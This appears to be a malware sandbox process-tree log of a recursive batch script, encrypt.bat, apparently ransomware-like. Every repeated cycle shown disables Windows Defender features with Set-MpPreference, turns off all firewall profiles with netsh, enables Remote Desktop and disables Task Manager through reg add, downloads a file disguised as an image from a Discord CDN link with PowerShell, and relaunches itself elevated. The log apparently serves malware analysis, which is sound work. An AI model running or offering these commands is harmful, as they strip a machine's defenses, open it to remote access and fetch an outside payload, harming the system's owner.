C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"6⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:748 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"7⤵PID:2988
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"8⤵PID:2700
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f8⤵PID:3196
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"8⤵PID:5032
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f8⤵PID:4552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable8⤵PID:4348
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE8⤵PID:4904
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off8⤵PID:1552
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off8⤵
- Modifies Windows Firewall
PID:2796
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off8⤵
- Modifies Windows Firewall
PID:4684
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off8⤵
- Modifies Windows Firewall
PID:4352
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off8⤵PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"8⤵PID:220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"8⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"8⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2796 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"9⤵PID:2108
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"10⤵PID:1212
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f10⤵PID:5032
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"10⤵PID:880
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f10⤵PID:4028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable10⤵PID:1212
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE10⤵
- Modifies Windows Firewall
PID:4684
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off10⤵
- Modifies Windows Firewall
PID:2700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off10⤵
- Modifies Windows Firewall
PID:4116
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off10⤵PID:452
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off10⤵
- Modifies Windows Firewall
PID:4904
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off10⤵
- Modifies Windows Firewall
PID:1804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"10⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"10⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5016 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"11⤵PID:4348
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"12⤵PID:316
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f12⤵PID:1328
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"12⤵PID:4840
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f12⤵PID:744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable12⤵PID:3924
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE12⤵
- Modifies Windows Firewall
PID:1804
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off12⤵
- Modifies Windows Firewall
PID:4752
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off12⤵
- Modifies Windows Firewall
PID:4224
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off12⤵
- Modifies Windows Firewall
PID:3360
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off12⤵
- Modifies Windows Firewall
PID:452
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off12⤵PID:4476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:4480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"12⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"12⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2844 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"13⤵PID:4636
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"14⤵PID:3792
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f14⤵PID:4568
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"14⤵PID:1764
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f14⤵PID:1912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵
- Command and Scripting Interpreter: PowerShell
PID:936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:4168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵
- Command and Scripting Interpreter: PowerShell
PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵PID:3460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵
- Command and Scripting Interpreter: PowerShell
PID:1092
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable14⤵
- Modifies Windows Firewall
PID:4568
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE14⤵PID:4644
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off14⤵PID:3204
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off14⤵PID:1012
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off14⤵
- Modifies Windows Firewall
PID:1540
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off14⤵
- Modifies Windows Firewall
PID:3576
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off14⤵
- Modifies Windows Firewall
PID:4292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"14⤵PID:816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"14⤵PID:1564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"14⤵PID:4476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"14⤵PID:1524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"14⤵PID:208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"14⤵PID:4568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"14⤵
- Blocklisted process makes network request
PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"14⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:3468 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"15⤵PID:1212
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"16⤵PID:440
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f16⤵PID:3356
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"16⤵PID:4648
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f16⤵PID:4684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:4256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:4804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:1552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵PID:3460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:4512
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable16⤵
- Modifies Windows Firewall
PID:3728
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE16⤵PID:2060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off16⤵
- Modifies Windows Firewall
PID:3468
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off16⤵
- Modifies Windows Firewall
PID:440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off16⤵PID:3764
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off16⤵
- Modifies Windows Firewall
PID:3980
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off16⤵PID:3412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"16⤵PID:3356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:1912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"16⤵PID:404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"16⤵PID:4568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:5048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"16⤵
- Command and Scripting Interpreter: PowerShell
PID:2512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"16⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:1928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"16⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:1184 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"17⤵PID:4568
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"18⤵PID:2604
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f18⤵PID:4752
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"18⤵PID:3172
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f18⤵PID:1552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵PID:692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵PID:728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵PID:4920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵PID:2488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵PID:744
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable18⤵
- Modifies Windows Firewall
PID:1928
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE18⤵
- Modifies Windows Firewall
PID:1804
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off18⤵
- Modifies Windows Firewall
PID:3208
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off18⤵
- Modifies Windows Firewall
PID:3052
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off18⤵
- Modifies Windows Firewall
PID:1708
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off18⤵
- Modifies Windows Firewall
PID:3088
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off18⤵
- Modifies Windows Firewall
PID:4168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"18⤵PID:396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"18⤵
- Command and Scripting Interpreter: PowerShell
PID:3540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"18⤵
- Command and Scripting Interpreter: PowerShell
PID:5016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"18⤵PID:728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"18⤵PID:864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"18⤵PID:3984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"18⤵
- Blocklisted process makes network request
PID:2008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"18⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:3516 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"19⤵PID:3360
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"20⤵PID:4396
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f20⤵PID:1544
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"20⤵PID:208
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f20⤵PID:4544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵
- Command and Scripting Interpreter: PowerShell
PID:440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵PID:3196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵PID:4804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵PID:744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"20⤵PID:208
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable20⤵PID:4144
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE20⤵PID:4520
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off20⤵PID:1764
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off20⤵PID:3248
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off20⤵
- Modifies Windows Firewall
PID:3196
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off20⤵PID:436
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off20⤵
- Modifies Windows Firewall
PID:3052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"20⤵PID:2088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"20⤵PID:2568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"20⤵
- Command and Scripting Interpreter: PowerShell
PID:404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"20⤵PID:4168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"20⤵
- Command and Scripting Interpreter: PowerShell
PID:208
-
-
